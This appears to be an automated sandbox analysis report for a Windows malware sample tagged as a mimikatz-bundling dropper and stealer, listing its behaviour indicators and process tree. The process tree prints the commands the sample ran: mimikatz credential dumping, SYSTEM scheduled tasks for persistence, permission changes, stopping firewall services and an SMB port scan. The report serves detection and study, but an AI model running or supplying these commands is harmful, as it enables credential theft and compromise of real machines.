2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 3048 xchlyg.exe 3048 xchlyg.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 3048 xchlyg.exe 3048 xchlyg.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 3048 xchlyg.exe 3048 xchlyg.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeLockMemoryPrivilege 1424 taskmgr.exe Token: SeDebugPrivilege 2112 vfshost.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Token: SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 1200 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 1200 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 5116 wimnat.exe 3048 xchlyg.exe 4464 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 4464 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 5808 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 5808 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2468 wrote to memory of 4284 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 97 PID 2468 wrote to memory of 4284 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 97 PID 2468 wrote to memory of 4284 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 97 PID 2468 wrote to memory of 4524 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 98 PID 2468 wrote to memory of 4524 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 98 PID 2468 wrote to memory of 4524 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 98 PID 2468 wrote to memory of 2084 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 99 PID 2468 wrote to memory of 2084 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 99 PID 2468 wrote to memory of 2084 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 99 PID 2468 wrote to memory of 760 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 101 PID 2468 wrote to memory of 760 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 101 PID 2468 wrote to memory of 760 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 101 PID 2468 wrote to memory of 1020 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 102 PID 2468 wrote to memory of 1020 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 102 PID 2468 wrote to memory of 1020 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 102 PID 2468 wrote to memory of 688 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 103 PID 2468 wrote to memory of 688 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 103 PID 2468 wrote to memory of 688 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 103 PID 2468 wrote to memory of 5100 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 104 PID 2468 wrote to memory of 5100 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 104 PID 2468 wrote to memory of 5100 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 104 PID 2468 wrote to memory of 1240 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 106 PID 2468 wrote to memory of 1240 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 106 PID 2468 wrote to memory of 1240 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 106 PID 2468 wrote to memory of 1424 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 107 PID 2468 wrote to memory of 1424 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 107 PID 2468 wrote to memory of 5116 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 109 PID 2468 wrote to memory of 5116 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 109 PID 2468 wrote to memory of 5116 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 109 PID 760 wrote to memory of 1956 760 cmd.exe 117 PID 760 wrote to memory of 1956 760 cmd.exe 117 PID 760 wrote to memory of 1956 760 cmd.exe 117 PID 760 wrote to memory of 3356 760 cmd.exe 118 PID 760 wrote to memory of 3356 760 cmd.exe 118 PID 760 wrote to memory of 3356 760 cmd.exe 118 PID 1020 wrote to memory of 3500 1020 cmd.exe 119 PID 1020 wrote to memory of 3500 1020 cmd.exe 119 PID 1020 wrote to memory of 3500 1020 cmd.exe 119 PID 688 wrote to memory of 5032 688 cmd.exe 120 PID 688 wrote to memory of 5032 688 cmd.exe 120 PID 688 wrote to memory of 5032 688 cmd.exe 120 PID 3500 wrote to memory of 3004 3500 net.exe 121 PID 3500 wrote to memory of 3004 3500 net.exe 121 PID 3500 wrote to memory of 3004 3500 net.exe 121 PID 5032 wrote to memory of 1460 5032 net.exe 122 PID 5032 wrote to memory of 1460 5032 net.exe 122 PID 5032 wrote to memory of 1460 5032 net.exe 122 PID 4524 wrote to memory of 4240 4524 cmd.exe 123 PID 4524 wrote to memory of 4240 4524 cmd.exe 123 PID 4524 wrote to memory of 4240 4524 cmd.exe 123 PID 4524 wrote to memory of 636 4524 cmd.exe 124 PID 4524 wrote to memory of 636 4524 cmd.exe 124 PID 4524 wrote to memory of 636 4524 cmd.exe 124 PID 5100 wrote to memory of 2596 5100 cmd.exe 125 PID 5100 wrote to memory of 2596 5100 cmd.exe 125 PID 5100 wrote to memory of 2596 5100 cmd.exe 125 PID 4284 wrote to memory of 2112 4284 cmd.exe 126 PID 4284 wrote to memory of 2112 4284 cmd.exe 126 PID 2084 wrote to memory of 4332 2084 cmd.exe 127 PID 2084 wrote to memory of 4332 2084 cmd.exe 127 PID 2084 wrote to memory of 4332 2084 cmd.exe 127 PID 2084 wrote to memory of 2384 2084 cmd.exe 128 PID 2084 wrote to memory of 2384 2084 cmd.exe 128 PID 2084 wrote to memory of 2384 2084 cmd.exe 128
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1200
-
C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exeC:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe1⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\InfusedAppe\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\InfusedAppe\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\InfusedAppe\Corporate\vfshost.exeC:\Windows\InfusedAppe\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "MiscfostNsi" /ru system /tr "cmd /c C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MiscfostNsi" /ru system /tr "cmd /c C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "WwANsvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "WwANsvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
PID:1460
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop LanmanServer2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\SysWOW64\net.exenet stop LanmanServer3⤵
- System Location Discovery: System Language Discovery
PID:2596 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop LanmanServer4⤵
- System Location Discovery: System Language Discovery
PID:116
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config LanmanServer start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:1240 -
C:\Windows\SysWOW64\sc.exesc config LanmanServer start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:548
-
-
-
C:\Windows\TEMP\Networks\taskmgr.exeC:\Windows\TEMP\Networks\taskmgr.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\TEMP\wimnat.exeC:\Windows\TEMP\wimnat.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5116
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\InfusedAppe\Priess\scan.bat2⤵
- System Location Discovery: System Language Discovery
PID:4380 -
C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exeGoogleCdoeUpdate.exe tcp 10.127.0.1 10.127.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4876
-
-
-
C:\Windows\SysWOW64\xchlyg.exeC:\Windows\SysWOW64\xchlyg.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3048
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F1⤵PID:4216
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:2360
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F2⤵PID:1444
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe1⤵PID:3712
-
C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exeC:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4464
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F1⤵PID:4944
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3732
-
-
C:\Windows\system32\cacls.execacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F2⤵PID:4004
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F1⤵PID:2396
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5372
-
-
